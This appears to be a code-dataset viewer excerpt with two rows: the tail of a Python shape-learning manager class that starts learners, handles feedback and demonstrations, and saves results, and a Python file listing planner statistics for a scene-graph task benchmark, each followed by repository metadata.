shapeType = self.currentCollection[i]
#check if shape has been learnt before
try:
shapeType_index = self.shapesLearnt.index(shapeType)
newShape = False
except ValueError:
newShape = True
self.shapeLearnersSeenBefore_currentCollection.append(not newShape)
if (newShape):
settings = self.generateSettings(shapeType)
shapeLearner = ShapeLearner(settings)
self.shapesLearnt.append(shapeType)
self.shapeLearners_all.append(shapeLearner)
self.settings_shapeLearners_all.append(settings)
self.shapeLearners_currentCollection.append(self.shapeLearners_all[-1])
self.settings_shapeLearners_currentCollection.append(self.settings_shapeLearners_all[-1])
else:
#use the bounds determined last time
previousBounds = self.shapeLearners_all[shapeType_index].getParameterBounds()
newInitialBounds = previousBounds
newInitialBounds[0, 0] -= boundExpandingAmount; #USE ONLY FIRST PARAM FOR SELF-LEARNING ALGORITHM ATM
newInitialBounds[0, 1] += boundExpandingAmount; #USE ONLY FIRST PARAM FOR SELF-LEARNING ALGORITHM ATM
self.shapeLearners_all[shapeType_index].setParameterBounds(newInitialBounds)
self.shapeLearners_currentCollection.append(self.shapeLearners_all[shapeType_index])
self.settings_shapeLearners_currentCollection.append(self.settings_shapeLearners_all[shapeType_index])
def startNextShapeLearner(self):
#start learning
if ( self.nextShapeLearnerToBeStarted < len(self.currentCollection) ):
shapeType = self.currentCollection[self.nextShapeLearnerToBeStarted]
shapeType_code = self.nextShapeLearnerToBeStarted
shape_index = self.indexOfShapeInCurrentCollection(shapeType)
if usePrevParamsWhenShapeReappears \
and self.shapeLearnersSeenBefore_currentCollection[self.nextShapeLearnerToBeStarted]: #shape has been seen before
[path, paramValues] = self.shapeLearners_currentCollection[shape_index].getLearnedShape()
shapeLogger.info("%s: continuing learning. Current params: %s. Path: %s" % (shapeType, paramValues.flatten().tolist(), path.flatten().tolist()))
else:
[path, paramValues] = self.shapeLearners_currentCollection[shape_index].startLearning()
shapeLogger.info("%s: starting learning. Initial params: %s. Path: %s" % (shapeType, paramValues.flatten().tolist(), path.flatten().tolist()))
paramsToVary = self.settings_shapeLearners_currentCollection[shape_index].paramsToVary
self.nextShapeLearnerToBeStarted += 1
shape = Shape(path=path, shapeID=0, shapeType=shapeType,
shapeType_code=shapeType_code, paramsToVary=paramsToVary, paramValues=paramValues)
return shape
else:
raise RuntimeError('Don\'t know what shape learner you want me to start...')
def feedbackManager(self, shapeIndex_messageFor, bestShape_index, noNewShape):
shape_messageFor = self.shapeAtIndexInCurrentCollection(shapeIndex_messageFor)
if (shape_messageFor < 0 ):
shapeLogger.warning('Ignoring message because not for valid shape type')
return -1
else:
if (noNewShape): #just respond to feedback, don't make new shape
self.shapeLearners_currentCollection[shapeIndex_messageFor].respondToFeedback(bestShape_index)
return 1
else:
[numItersConverged, newPath, newParamValues] = self.shapeLearners_currentCollection[
shapeIndex_messageFor].generateNewShapeGivenFeedback(bestShape_index)
paramsToVary = self.settings_shapeLearners_currentCollection[shapeIndex_messageFor].paramsToVary
shape = Shape(path=newPath, shapeID=[], shapeType=shape_messageFor,
shapeType_code=shapeIndex_messageFor, paramsToVary=paramsToVary, paramValues=newParamValues)
return numItersConverged, shape
def respondToDemonstration(self, shapeIndex_messageFor, shape):
shape_messageFor = self.shapeAtIndexInAllShapesLearnt(shapeIndex_messageFor)
if (shape_messageFor < 0 ):
shapeLogger.warning('Ignoring demonstration because not for valid shape type')
return -1
else:
newPath, newParamValues, params_demo = self.shapeLearners_currentCollection[shapeIndex_messageFor].respondToDemonstration(shape)
shapeLogger.info("%s: new demonstration. Params: %s. Path: %s" % (shape_messageFor, params_demo.flatten().tolist(), shape.flatten().tolist()))
paramsToVary = self.settings_shapeLearners_currentCollection[shapeIndex_messageFor].paramsToVary
shape = Shape(path=newPath,
shapeID=[],
shapeType=shape_messageFor,
shapeType_code=shapeIndex_messageFor,
paramsToVary=paramsToVary,
paramValues=newParamValues)
shapeLogger.info("%s: new generated model. Params: %s. Path: %s" % (shape_messageFor, newParamValues.flatten().tolist(), newPath.flatten().tolist()))
return shape
def indexOfShapeInCurrentCollection(self, shapeType):
try:
shapeType_index = self.currentCollection.index(shapeType)
except ValueError: #unknown shape
shapeType_index = -1
return shapeType_index
def indexOfShapeInAllShapesLearnt(self, shapeType):
try:
shapeType_index = self.shapesLearnt.index(shapeType)
except ValueError: #unknown shape
shapeType_index = -1
return shapeType_index
def shapeAtIndexInCurrentCollection(self, shapeType_index):
try:
shapeType = self.currentCollection[shapeType_index]
except ValueError: #unknown shape
shapeType = -1
return shapeType
def shapeAtIndexInAllShapesLearnt(self, shapeType_index):
try:
shapeType = self.shapesLearnt[shapeType_index]
except ValueError: #unknown shape
shapeType = -1
return shapeType
def shapesOfCurrentCollection(self):
shapes = []
for idx, shape_learner in enumerate(self.shapeLearners_currentCollection):
path, paramValues = shape_learner.getLearnedShape()
paramsToVary = shape_learner.paramsToVary
shapeName = self.shapeAtIndexInCurrentCollection(idx)
code = self.indexOfShapeInAllShapesLearnt(shapeName)
shape = Shape(path=path,
shapeID=[],
shapeType=shapeName,
shapeType_code=code,
paramsToVary=paramsToVary,
paramValues=paramValues)
shapes.append(shape)
return shapes
def newCollection(self, collection):
self.currentCollection = ""
# check, for each letter, that we have the corresponding dataset
for l in collection:
try:
self.generateSettings(l)
except RuntimeError:
# no dataset for this letter!
shapeLogger.error("No dataset available for letter <%s>. Skipping this letter." % l)
continue
self.currentCollection += l
self.nextShapeLearnerToBeStarted = 0
shapeLogger.info("Starting to work on word <%s>" % collection)
try:
self.collectionsLearnt.index(self.currentCollection)
collectionSeenBefore = True
except ValueError:
collectionSeenBefore = False
self.collectionsLearnt.append(self.currentCollection)
self.initialiseShapeLearners()
return collectionSeenBefore
def resetParameterBounds(self, shapeType_index):
currentBounds = self.shapeLearners_currentCollection[shapeType_index].getParameterBounds()
#change bounds back to the initial ones
newBounds = self.shapeLearners_currentCollection[shapeType_index].initialBounds
self.shapeLearners_currentCollection[shapeType_index].setParameterBounds(newBounds)
shapeLogger.debug('Changing bounds on shape ' + self.shapeAtIndexInCurrentCollection(shapeType_index) + ' from ' + str(
currentBounds) + ' to ' + str(newBounds))
def generateSimulatedFeedback(self, shapeType_index, newShape, newParamValue):
return self.shapeLearners_currentCollection[shapeType_index].generateSimulatedFeedback(newShape, newParamValue)
def save_all(self, shapeIndex_messageFor):
shape_messageFor = self.shapeAtIndexInAllShapesLearnt(shapeIndex_messageFor)
if (shape_messageFor < 0):
shapeLogger.warning('Ignoring demonstration because not for valid shape type')
return -1
else:
self.shapeLearners_currentCollection[shapeIndex_messageFor].save_all()
def save_demo(self, shapeIndex_messageFor):
shape_messageFor = self.shapeAtIndexInAllShapesLearnt(shapeIndex_messageFor)
if (shape_messageFor < 0):
shapeLogger.warning('Ignoring demonstration because not for valid shape type')
return -1
else:
self.shapeLearners_currentCollection[shapeIndex_messageFor].save_demo()
def save_params(self, shapeIndex_messageFor):
shape_messageFor = self.shapeAtIndexInAllShapesLearnt(shapeIndex_messageFor)
if (shape_messageFor < 0):
shapeLogger.warning('Ignoring demonstration because not for valid shape type')
return -1
else:
self.shapeLearners_currentCollection[shapeIndex_messageFor].save_params()
| 45.857678
| 167
| 0.669797
|
0107de134100c76d2b0ef4d22f40669dbeb4ff06
| 11,276
|
py
|
Python
|
scenegraph/exp-official/taskographyv2medium1_DecStar-agl-fb/taskographyv2medium1_DecStar-agl-fb_test.py
|
taskography/3dscenegraph-dev
|
2c261241230fbea1f1c687ff793478248f25c02c
|
[
"MIT"
] | 1
|
2022-01-30T22:06:57.000Z
|
2022-01-30T22:06:57.000Z
|
scenegraph/exp-official/taskographyv2medium1_DecStar-agl-fb/taskographyv2medium1_DecStar-agl-fb_test.py
|
taskography/3dscenegraph-dev
|
2c261241230fbea1f1c687ff793478248f25c02c
|
[
"MIT"
] | null | null | null |
scenegraph/exp-official/taskographyv2medium1_DecStar-agl-fb/taskographyv2medium1_DecStar-agl-fb_test.py
|
taskography/3dscenegraph-dev
|
2c261241230fbea1f1c687ff793478248f25c02c
|
[
"MIT"
] | null | null | null |
STATS = [
{
"num_node_expansions": 24,
"plan_cost": 20,
"plan_length": 20,
"search_time": 0.8,
"total_time": 1.81
},
{
"num_node_expansions": 22,
"plan_cost": 18,
"plan_length": 18,
"search_time": 0.73,
"total_time": 1.72
},
{
"num_node_expansions": 19,
"plan_cost": 17,
"plan_length": 17,
"search_time": 0.59,
"total_time": 1.54
},
{
"num_node_expansions": 15,
"plan_cost": 12,
"plan_length": 12,
"search_time": 0.54,
"total_time": 1.29
},
{
"num_node_expansions": 18,
"plan_cost": 15,
"plan_length": 15,
"search_time": 0.75,
"total_time": 1.67
},
{
"num_node_expansions": 12,
"plan_cost": 10,
"plan_length": 10,
"search_time": 0.87,
"total_time": 1.86
},
{
"num_node_expansions": 18,
"plan_cost": 16,
"plan_length": 16,
"search_time": 1.27,
"total_time": 3.09
},
{
"num_node_expansions": 15,
"plan_cost": 13,
"plan_length": 13,
"search_time": 1.36,
"total_time": 3.6
},
{
"num_node_expansions": 27,
"plan_cost": 23,
"plan_length": 23,
"search_time": 0.68,
"total_time": 1.74
},
{
"num_node_expansions": 31,
"plan_cost": 27,
"plan_length": 27,
"search_time": 0.61,
"total_time": 1.27
},
{
"num_node_expansions": 28,
"plan_cost": 24,
"plan_length": 24,
"search_time": 0.94,
"total_time": 2.6
},
{
"num_node_expansions": 18,
"plan_cost": 16,
"plan_length": 16,
"search_time": 0.75,
"total_time": 1.95
},
{
"num_node_expansions": 13,
"plan_cost": 11,
"plan_length": 11,
"search_time": 0.21,
"total_time": 0.47
},
{
"num_node_expansions": 19,
"plan_cost": 16,
"plan_length": 16,
"search_time": 0.23,
"total_time": 0.5
},
{
"num_node_expansions": 24,
"plan_cost": 19,
"plan_length": 19,
"search_time": 1.98,
"total_time": 4.66
},
{
"num_node_expansions": 21,
"plan_cost": 19,
"plan_length": 19,
"search_time": 1.47,
"total_time": 4.19
},
{
"num_node_expansions": 17,
"plan_cost": 14,
"plan_length": 14,
"search_time": 1.29,
"total_time": 3.99
},
{
"num_node_expansions": 23,
"plan_cost": 20,
"plan_length": 20,
"search_time": 1.45,
"total_time": 4.32
},
{
"num_node_expansions": 10,
"plan_cost": 8,
"plan_length": 8,
"search_time": 0.58,
"total_time": 1.46
},
{
"num_node_expansions": 17,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.54,
"total_time": 1.32
},
{
"num_node_expansions": 15,
"plan_cost": 13,
"plan_length": 13,
"search_time": 0.24,
"total_time": 0.63
},
{
"num_node_expansions": 25,
"plan_cost": 19,
"plan_length": 19,
"search_time": 0.24,
"total_time": 0.62
},
{
"num_node_expansions": 14,
"plan_cost": 11,
"plan_length": 11,
"search_time": 1.44,
"total_time": 4.23
},
{
"num_node_expansions": 31,
"plan_cost": 24,
"plan_length": 24,
"search_time": 1.97,
"total_time": 4.85
},
{
"num_node_expansions": 18,
"plan_cost": 16,
"plan_length": 16,
"search_time": 2.34,
"total_time": 7.02
},
{
"num_node_expansions": 18,
"plan_cost": 13,
"plan_length": 13,
"search_time": 2.5,
"total_time": 6.92
},
{
"num_node_expansions": 17,
"plan_cost": 14,
"plan_length": 14,
"search_time": 1.01,
"total_time": 2.56
},
{
"num_node_expansions": 28,
"plan_cost": 21,
"plan_length": 21,
"search_time": 0.98,
"total_time": 2.43
},
{
"num_node_expansions": 15,
"plan_cost": 13,
"plan_length": 13,
"search_time": 0.03,
"total_time": 0.12
},
{
"num_node_expansions": 13,
"plan_cost": 10,
"plan_length": 10,
"search_time": 0.03,
"total_time": 0.11
},
{
"num_node_expansions": 13,
"plan_cost": 11,
"plan_length": 11,
"search_time": 0.11,
"total_time": 0.29
},
{
"num_node_expansions": 20,
"plan_cost": 18,
"plan_length": 18,
"search_time": 0.1,
"total_time": 0.28
},
{
"num_node_expansions": 13,
"plan_cost": 10,
"plan_length": 10,
"search_time": 0.85,
"total_time": 2.07
},
{
"num_node_expansions": 17,
"plan_cost": 15,
"plan_length": 15,
"search_time": 0.99,
"total_time": 2.53
},
{
"num_node_expansions": 16,
"plan_cost": 12,
"plan_length": 12,
"search_time": 0.89,
"total_time": 2.2
},
{
"num_node_expansions": 14,
"plan_cost": 10,
"plan_length": 10,
"search_time": 0.76,
"total_time": 1.88
},
{
"num_node_expansions": 19,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.29,
"total_time": 0.63
},
{
"num_node_expansions": 17,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.28,
"total_time": 0.62
},
{
"num_node_expansions": 9,
"plan_cost": 7,
"plan_length": 7,
"search_time": 0.13,
"total_time": 0.33
},
{
"num_node_expansions": 9,
"plan_cost": 7,
"plan_length": 7,
"search_time": 0.13,
"total_time": 0.35
},
{
"num_node_expansions": 14,
"plan_cost": 11,
"plan_length": 11,
"search_time": 0.69,
"total_time": 1.85
},
{
"num_node_expansions": 19,
"plan_cost": 15,
"plan_length": 15,
"search_time": 0.59,
"total_time": 1.44
},
{
"num_node_expansions": 20,
"plan_cost": 17,
"plan_length": 17,
"search_time": 2.37,
"total_time": 7.75
},
{
"num_node_expansions": 21,
"plan_cost": 17,
"plan_length": 17,
"search_time": 1.31,
"total_time": 3.64
},
{
"num_node_expansions": 22,
"plan_cost": 17,
"plan_length": 17,
"search_time": 1.23,
"total_time": 3.3
},
{
"num_node_expansions": 21,
"plan_cost": 17,
"plan_length": 17,
"search_time": 0.12,
"total_time": 0.29
},
{
"num_node_expansions": 22,
"plan_cost": 20,
"plan_length": 20,
"search_time": 0.11,
"total_time": 0.28
},
{
"num_node_expansions": 26,
"plan_cost": 20,
"plan_length": 20,
"search_time": 2.96,
"total_time": 7.54
},
{
"num_node_expansions": 16,
"plan_cost": 12,
"plan_length": 12,
"search_time": 0.54,
"total_time": 1.39
},
{
"num_node_expansions": 25,
"plan_cost": 19,
"plan_length": 19,
"search_time": 0.55,
"total_time": 1.42
},
{
"num_node_expansions": 16,
"plan_cost": 12,
"plan_length": 12,
"search_time": 0.09,
"total_time": 0.23
},
{
"num_node_expansions": 16,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.09,
"total_time": 0.23
},
{
"num_node_expansions": 21,
"plan_cost": 19,
"plan_length": 19,
"search_time": 0.23,
"total_time": 0.55
},
{
"num_node_expansions": 23,
"plan_cost": 17,
"plan_length": 17,
"search_time": 0.27,
"total_time": 0.57
},
{
"num_node_expansions": 13,
"plan_cost": 10,
"plan_length": 10,
"search_time": 1.89,
"total_time": 5.64
},
{
"num_node_expansions": 17,
"plan_cost": 13,
"plan_length": 13,
"search_time": 1.65,
"total_time": 5.2
},
{
"num_node_expansions": 24,
"plan_cost": 19,
"plan_length": 19,
"search_time": 1.21,
"total_time": 2.68
},
{
"num_node_expansions": 21,
"plan_cost": 18,
"plan_length": 18,
"search_time": 1.18,
"total_time": 2.87
},
{
"num_node_expansions": 15,
"plan_cost": 12,
"plan_length": 12,
"search_time": 0.68,
"total_time": 1.55
},
{
"num_node_expansions": 11,
"plan_cost": 8,
"plan_length": 8,
"search_time": 0.62,
"total_time": 1.29
},
{
"num_node_expansions": 20,
"plan_cost": 18,
"plan_length": 18,
"search_time": 0.13,
"total_time": 0.32
},
{
"num_node_expansions": 27,
"plan_cost": 23,
"plan_length": 23,
"search_time": 0.13,
"total_time": 0.33
},
{
"num_node_expansions": 15,
"plan_cost": 12,
"plan_length": 12,
"search_time": 1.09,
"total_time": 3.19
},
{
"num_node_expansions": 16,
"plan_cost": 12,
"plan_length": 12,
"search_time": 1.37,
"total_time": 3.65
},
{
"num_node_expansions": 20,
"plan_cost": 16,
"plan_length": 16,
"search_time": 0.8,
"total_time": 2.01
},
{
"num_node_expansions": 26,
"plan_cost": 19,
"plan_length": 19,
"search_time": 0.8,
"total_time": 1.88
},
{
"num_node_expansions": 18,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.65,
"total_time": 1.74
},
{
"num_node_expansions": 16,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.63,
"total_time": 1.67
},
{
"num_node_expansions": 29,
"plan_cost": 27,
"plan_length": 27,
"search_time": 0.82,
"total_time": 2.2
},
{
"num_node_expansions": 18,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.71,
"total_time": 2.03
},
{
"num_node_expansions": 14,
"plan_cost": 12,
"plan_length": 12,
"search_time": 0.09,
"total_time": 0.24
},
{
"num_node_expansions": 17,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.07,
"total_time": 0.23
}
]
num_timeouts = 100
num_timeouts = 0
num_problems = 172
| 22.109804
| 34
| 0.462043
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.